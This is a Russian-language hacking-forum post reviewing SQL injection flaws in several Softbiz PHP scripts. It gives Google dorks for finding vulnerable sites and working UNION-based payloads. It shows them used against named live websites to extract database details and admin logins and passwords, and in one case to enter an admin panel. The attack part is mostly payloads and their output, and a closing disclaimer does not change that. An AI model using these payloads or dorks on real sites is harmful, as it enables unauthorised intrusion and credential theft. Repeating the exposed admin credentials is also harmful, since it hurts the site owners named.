Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Обзор SQL-inj в Softbiz (https://forum.antichat.xyz/showthread.php?t=53685)

-=lebed=- 16.11.2007 12:57
Обзор SQL-inj в Softbiz
 
Уязвимости в программах Softbiz.

1. Уязвимость в Softbiz Link Directory Script
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "sbcat_id" сценарием searchresult.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://site/searchresult.php?sbcat_id=<SQL-inj>
Дорк:"Powered by SoftbizScripts" "OUR SPONSORS"
Вытаскиваем логин и пасс админа:
Код:
http://sitem/searchresult.php?sbcat_id=-1 union/**/select/**/0,concat(username,password),2,3/**/from/**/sblnk_admin/*
Пример:
_www.shopcdn.ca (ShopCANADIAN)
Смотрим версию мускула, пользователя, базу:
Код:
_http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/*
5.0.22-community-max-nt:shopcdn@209.132.230.90:shopcdn
Повезло: версия=>5
Смотрим таблицы, меняя лимит:
Код:
http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,table_name,3,4+from+information_schema.tables+limit+1,1/*
40 таблиц
Интересная таблица sblnk_admin
смотрим логин и пасс админов:
Код:
_http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,concat(username,0x3a,password),3,4+from+sblnk_admin/*
admin:1234®
Ищем админку (и находим сразу):
Код:
_http://www.shopcdn.ca/admin/
К сожалению логин и пасс к админке не подходят.

2. Уязвимость в Softbiz Banner Exchange Network Script 1.0
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" сценарием campaign_stats.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://site/campaign_stats.php?id=<SQL-inj>
К сожалению, гугл не нашёл сайтов, где крутится этот скрипт.

3.Уязвимость в Softbiz Ad Management plus Script 1
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "package" сценарием ads.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://site/ads.php?package=<SQL-inj>
Однако и тут Гугл молчит (не видел я скрипта ads.php, которому передаётся параметр package). Однако я нашёл несколько ads.php, которым передаются различные параметры, в частности: archive&rubric_id и тут же решил поискать скуль, что увенчалось успехом (параметр rubric_id оказался уязвимым, хотя и вывода ошибки не было, но раз арифметические действия выполнялись, я понял, что скуль есть, но слепая):
Код:
_http://www.dancor.sumy.ua/ads.php?archive=0&rubric_id=-123/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
4.Уязвимость в Softbiz Auctions Script
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" сценарием product_desc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://site/product_desc.php?id=<SQL-inj>
<SQL-inj>=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* (36 колонок).
По запросу inurl:"product_desc.php?id=" "Powered by SoftbizScripts" Гугл мне выплюнул кучу ссылок, я начал искать бажные сайты, чтоб заюзать скуль. Мне попадалось много взломанных сайтов, сайтов выдающих ошибки мускула и наконец, я нашёл возможность проверить багу:
Подопытным стал: _www.buysellrecords.com
Посмотрим версию, юзера и базу:
Код:
_http://www.buysellrecords.com/product_desc.php?id=999999+union+select+1,2,concat(version(),0x3a,user(),0x3a,database
()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
4.1.22-standard-log:buysellr_buysell@localhost:buysellr_sbauctions
Проверим наличие таблицы sbauctions_admin:
Код:
_http://www.buysellrecords.com/product_desc.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/sbauctions_admin/*
Запрос выполнился, значит табличка есть, смотрим логин и пасс админа:
Код:
_http://www.buysellrecords.com/product_desc.php?id=999999%20union/**/select/**/0,1,concat(admin_name,0x3a,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/sbauctions_admin/*
admin:virginia97
Находим админку:
Код:
_http://www.buysellrecords.com/admin/
Обнаруживаем, что логин и пасс подходят к админке. Всё Вы админ сайта, а дальше сами...

PS Информация представлена исключительно для ознакомления, автор не несёт ответсвенности за ваши неправомерные действия...
По материалам: www.milw0rm.com


Время: 23:28